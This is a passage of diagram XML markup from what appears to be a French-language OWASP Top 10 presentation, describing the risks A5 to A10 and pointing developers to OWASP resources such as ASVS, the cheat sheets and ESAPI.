            <a:t>Une bonne sécurité nécessite de disposer d'une configuration sécurisée définie et déployée pour l'application, contextes, serveur d'application, serveur web, serveur de base de données et la plate-forme. Tous ces paramètres doivent être définis, mis en œuvre et maintenus, car beaucoup ne sont pas livrés sécurisés par défaut. Cela implique de tenir tous les logiciels à jour</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="3322977"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E090A74-1099-4AEA-9902-A404935E56DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="3216637"/>
          <a:ext cx="1413251" cy="76474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A5 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Mauvaise configuration Sécurité</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="3253969"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="1792902"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Beaucoup d'applications web ne protègent pas correctement les données sensibles telles que les cartes de crédit, identifiants d'impôt et informations d'authentification. Les pirates peuvent voler ou modifier ces données faiblement protégées pour effectuer un vol d'identité, de la  fraude à la carte de crédit ou autres crimes. Les données sensibles méritent une protection supplémentaire tel un chiffrement statique ou en transit, ainsi que des précautions particulières lors de l'échange avec le navigateur</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="4125958"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4019618"/>
          <a:ext cx="1413251" cy="76474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A6 – Exposition de données </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>sensibles</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="4056950"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="2595883"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Pratiquement toutes les applications web vérifient les droits d'accès au niveau fonctionnel avant de rendre cette fonctionnalité visible dans l'interface utilisateur. Cependant, les applications doivent effectuer les mêmes vérifications de contrôle d'accès sur le serveur lors de l'accès à chaque fonction. Si les demandes ne sont pas vérifiées, les attaquants seront en mesure de forger des demandes afin d'accéder à une fonctionnalité non autorisée</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="4928939"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4822599"/>
          <a:ext cx="1413251" cy="76474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A7 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Manque</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>contrôle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>d’accès</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> au </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>niveau</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>fonctionnel</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="4859931"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="3398865"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Une attaque CSRF (Cross Site </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Request</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Forgery</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>) force le navigateur d'une victime authentifiée à envoyer une requête HTTP forgée, comprenant le cookie de session de la victime ainsi que toute autre information automatiquement inclue, à une application web vulnérable. Ceci permet à l'attaquant de forcer le navigateur de la victime à générer des requêtes dont l'application vulnérable pense qu'elles émanent légitimement de la victime</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="5731921"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="5625581"/>
          <a:ext cx="1413251" cy="76474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A8 - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Falsification de requête </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>intersite</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> (CSRF)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="5662913"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3AEEED12-760D-417A-B975-196C59CB31B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="4201846"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les composants vulnérables, tels que bibliothèques, contextes et autres modules logiciels fonctionnent presque toujours avec des privilèges maximum. Ainsi, si exploités, ils peuvent causer des pertes de données sérieuses ou une prise de contrôle du serveur. Les applications utilisant ces composants vulnérables peuvent compromettre leurs défenses et permettre une série d'attaques et d'impacts potentiels</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="6534902"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="6428562"/>
          <a:ext cx="1413251" cy="76474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A9 - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Utilisation de composants avec des vulnérabilités connues</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="6465894"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="5004827"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les applications web réorientent et redirigent fréquemment les utilisateurs vers d'autres pages et sites internet, et utilisent des données non fiables pour déterminer les pages de destination. Sans validation appropriée, les attaquants peuvent réorienter les victimes vers des sites de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>phishing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> ou de malware, ou utiliser les renvois pour accéder à des pages non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="7337883"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="7231543"/>
          <a:ext cx="1413251" cy="76474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1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>A10 – Redirections et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>renvois</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> non validés</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="7268875"/>
        <a:ext cx="1338587" cy="690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465073" y="-2318797"/>
          <a:ext cx="773043" cy="5608320"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Afin de produire une application web sécurisée, vous devez d'abord définir ce que cela signifie pour cette application. Utilisez le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>standard de vérification de la sécurité d'une application (ASVS)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> comme guide pour déterminer les exigences de sécurité de votre application. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Si le développement de l’application est sous-traité, utilisez plutôt l'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>annexe contractuelle pour du logiciel sécurisé</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> de l'OWASP.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="136578"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="2210"/>
          <a:ext cx="940189" cy="96630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lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>Exigences</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>l’application</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="48106"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="-1304178"/>
          <a:ext cx="773043" cy="5608320"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Il est bien plus efficace d’intégrer la sécurité dans une application dès sa conception plutôt que d'identifier les failles et les corriger a posteriori.  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>Les aide-mémoire de l'OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> ont pour objectif de vous guider dans cette tâche. L’OWASP recommande également la lecture du </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>guide de développement OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="1151197"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="1016829"/>
          <a:ext cx="940189" cy="96630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b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Architecture</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> applicative </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurisée</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="1062725"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="-289560"/>
          <a:ext cx="773043" cy="5608320"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Il est particulièrement difficile de concevoir des contrôles de sécurité fiables et simples à utiliser. La fourniture d'un jeu de contrôles standard simplifie radicalement le développement d'applications sécurisées. L'OWASP recommande comme modèle pour le développement sécurisé des APIs de votre application le projet "</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>OWASP Enterprise Security API (ESAPI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>". Il inclut des implémentations de référence en </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Java</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
